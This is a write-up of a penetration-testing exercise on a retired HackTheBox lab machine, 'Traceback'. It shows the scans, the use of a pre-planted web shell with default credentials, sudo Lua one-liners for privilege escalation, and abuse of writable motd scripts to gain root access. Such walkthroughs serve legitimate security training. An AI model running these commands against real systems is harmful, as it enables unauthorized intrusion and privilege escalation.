This series will follow my exercises in HackTheBox. All published writeups are for retired HTB machines. Whether or not I use Metasploit to pwn the server will be indicated in the title.
Traceback
Difficulty: Easy
Machine IP: 10.10.10.181
I kick things off with a port scan.
sudo nmap -sS -T4 -p- 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:35 EDT
Nmap scan report for 10.10.10.181
Host is up (0.019s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 13.56 seconds
sudo nmap -sT -T4 -p22,80 -A -sC -sV 10.10.10.181
Starting Nmap 7.80 ( https://nmap.org ) at 2020-06-09 00:36 EDT
Nmap scan report for 10.10.10.181
Host is up (0.015s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
All right, a web server.
gobuster doesn’t turn up anything.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 20 -u http://10.10.10.181/ -x txt,php
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -t 30 -u http://10.10.10.181 -x txt,php
Navigating to http://10.10.10.181/ brings up a page with the following message:
This site has been owned
I have left a backdoor for all the net. FREE INTERNETZZZ
Xh4H -
The source of the page includes the comment:
<!--Some of the best web shells that you might need ;)-->
Searching the internet for Xh4H brings up this tweet:
Pretty interesting collection of webshells: https://t.co/gRllNN08zt
— Xh4H (@RiftWhiteHat) March 10, 2020
That brings me to https://github.com/TheBinitGhimire/Web-Shells.
I compile a wordlist of web shell endpoints and run them through gobuster.
This time I get a hit!
gobuster dir -w webshells.txt -u http://10.10.10.181
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.181
[+] Threads: 10
[+] Wordlist: webshells.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/06/09 00:53:10 Starting gobuster
===============================================================
/smevk.php (Status: 200)
===============================================================
2020/06/09 00:53:10 Finished
===============================================================
Navigating to that URL brings up a web shell login page.
Looking at the web shell source, I see the credentials are admin / admin.
This logs me in.
I can run commands through the web shell, but I cannot trigger netcat.
I opt for some information gathering before creating a full reverse shell through this web shell.
I am running as the webadmin user.
There is another user on the system as well, sysadmin.
In the webadmin’s directory, I find a note:
A tool somewhere that lets me invoke Lua, huh?
I check webadmin’s bash history and find the location of the script:
/home/sysadmin/luvit it is.
And it looks like webadmin has permission to run the script:
GTFOBins has some suggestions on how to use Lua for my purposes. I can read the user flag with:
sudo -u sysadmin /home/sysadmin/luvit -e 'local f=io.open("/home/sysadmin/user.txt", "rb"); print(f:read("*a")); io.close(f);'
Now for the reverse shell.
Instead of figuring out a Lua one-liner, I opt to upload a PHP reverse shell (like /use/share/webshells/php/php-reverse-shell.php that is included on Kali) to the web server using the smevk web shell.
This gives me a webadmin user shell.
With a TTY shell, I can escalate my privileges to sysadmin by running:
sudo -u sysadmin /home/sysadmin/luvit -e 'os.execute("/bin/bash -i")'
I check to see what files sysadmin can access on the server:
find / -type f -user sysadmin 2>/dev/null | grep -v '/proc/'
/home/sysadmin/.bashrc
/home/sysadmin/luvit
/home/sysadmin/.bash_logout
/home/sysadmin/.ssh/authorized_keys
/home/sysadmin/.cache/motd.legal-displayed
/home/sysadmin/.bash_history
/home/sysadmin/user.txt
/home/sysadmin/.profile
/home/webadmin/note.txt
/home/sysadmin/.cache/motd.legal-displayed is unusual, but otherwise not interesting.
I also run LinEnum which highlights an interesting process that seems related to this file.
It appears that every 30 seconds, root updates the motd content.
motd handles the banner messages when you ssh onto a system.
Since I am sysadmin, I can go to /home/sysadmin/.ssh/authorized_keys and add my public key.
SSHing onto the system, I see the following banner message:
I see this message comes from the /etc/update-motd.d/00-header file.
sysadmin has write access to these files.
sysadmin@traceback:/etc/update-motd.d$ ls -l
total 24
-rwxrwxr-x 1 root sysadmin 981 Jun 8 23:17 00-header
-rwxrwxr-x 1 root sysadmin 982 Jun 8 23:17 10-help-text
-rwxrwxr-x 1 root sysadmin 4264 Jun 8 23:17 50-motd-news
-rwxrwxr-x 1 root sysadmin 604 Jun 8 23:17 80-esm
-rwxrwxr-x 1 root sysadmin 299 Jun 8 23:17 91-release-upgrade
I should be able to get a reverse shell by modifying this 00-header file, but I couldn’t get the syntax correct.
The official Traceback write-up has a payload, it seems.
Instead, I opted to read the root flag.
When I next SSH onto the system, I am presented with the root flag. Remember that root flags are ephemeral these days, so this root flag is no longer valid and attempting to use it may get your HTB account flagged.
